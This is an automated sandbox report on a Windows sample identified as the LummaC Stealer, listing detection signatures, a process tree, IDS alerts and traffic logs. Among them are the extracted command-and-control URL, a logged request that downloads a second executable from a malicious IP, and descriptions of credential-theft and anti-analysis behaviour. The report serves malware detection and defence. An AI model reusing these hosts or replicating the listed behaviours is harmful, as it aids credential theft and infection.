Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561644
MD5:88a2e1dc5f57311dc42a7d57dc7d9827
SHA1:a26e33ea17b7d5ca3272e8a7521f141c927d1b75
SHA256:c2c829ba69f689fe392435d8b886c002e050d3bb4cc6ec8f62317ceaa7ba02da
Tags:exeuser-Bitsight
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 2608 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 88A2E1DC5F57311DC42A7D57DC7D9827)
    • chrome.exe (PID: 6544 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 6608 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1712,i,16499392452807308267,17586683353551675273,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7444 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7636 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2012,i,16342311137299287003,18054011809701615545,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
{"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: file.exe PID: 2608JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: file.exe PID: 2608JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-24T03:04:08.063341+010020283713Unknown Traffic192.168.2.549704104.21.33.116443TCP
        2024-11-24T03:04:10.117380+010020283713Unknown Traffic192.168.2.549705104.21.33.116443TCP
        2024-11-24T03:04:12.418353+010020283713Unknown Traffic192.168.2.549706104.21.33.116443TCP
        2024-11-24T03:04:14.712370+010020283713Unknown Traffic192.168.2.549707104.21.33.116443TCP
        2024-11-24T03:04:17.226185+010020283713Unknown Traffic192.168.2.549708104.21.33.116443TCP
        2024-11-24T03:04:19.914033+010020283713Unknown Traffic192.168.2.549709104.21.33.116443TCP
        2024-11-24T03:04:22.887334+010020283713Unknown Traffic192.168.2.549710104.21.33.116443TCP
        2024-11-24T03:04:27.849976+010020283713Unknown Traffic192.168.2.549722104.21.33.116443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-24T03:04:08.756732+010020546531A Network Trojan was detected192.168.2.549704104.21.33.116443TCP
        2024-11-24T03:04:10.843734+010020546531A Network Trojan was detected192.168.2.549705104.21.33.116443TCP
        2024-11-24T03:04:28.607200+010020546531A Network Trojan was detected192.168.2.549722104.21.33.116443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-24T03:04:08.756732+010020498361A Network Trojan was detected192.168.2.549704104.21.33.116443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-24T03:04:10.843734+010020498121A Network Trojan was detected192.168.2.549705104.21.33.116443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-24T03:04:30.108472+010020197142Potentially Bad Traffic192.168.2.549729185.215.113.1680TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-24T03:04:20.641197+010020480941Malware Command and Control Activity Detected192.168.2.549709104.21.33.116443TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: file.exeAvira: detected
        Source: file.exe.2608.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
        Source: file.exeVirustotal: Detection: 51%Perma Link
        Source: file.exeJoe Sandbox ML: detected
        Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
        Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
        Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
        Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49766 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49706 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49707 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49708 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49709 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49710 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49711 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49722 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.5:49749 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.5:49754 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49811 version: TLS 1.2
        Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000003.2361037563.00000000085C0000.00000004.00001000.00020000.00000000.sdmp

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 104.21.33.116:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.33.116:443
        Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 104.21.33.116:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 104.21.33.116:443
        Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49709 -> 104.21.33.116:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49722 -> 104.21.33.116:443
        Source: Malware configuration extractorURLs: https://property-imper.sbs/api
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Nov 2024 02:04:29 GMTContent-Type: application/octet-streamContent-Length: 2842624Last-Modified: Sun, 24 Nov 2024 02:00:08 GMTConnection: keep-aliveETag: "674288a8-2b6000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 c0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 2c 00 00 04 00 00 b6 27 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 68 65 63 6c 6f 66 6d 73 00 00 2b 00 00 a0 00 00 00 00 2b 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 77 74 78 73 6f 75 6b 00 20 00 00 00 a0 2b 00 00 04 00 00 00 3a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 c0 2b 00 00 22 00 00 00 3e 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Source: Joe Sandbox ViewIP Address: 13.107.246.63 13.107.246.63
        Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
        Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
        Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
        Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.33.116:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.33.116:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.21.33.116:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.33.116:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.33.116:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.33.116:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49722 -> 104.21.33.116:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 104.21.33.116:443
        Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49729 -> 185.215.113.16:80
        Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49766 version: TLS 1.0
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=O+PWlvUr11LBdsr&MD=VdRA74wY HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
        Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
        Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=O+PWlvUr11LBdsr&MD=VdRA74wY HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
        Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
        Source: chromecache_110.5.dr, chromecache_122.5.drString found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
        Source: chromecache_110.5.dr, chromecache_122.5.drString found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
        Source: chromecache_110.5.dr, chromecache_122.5.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
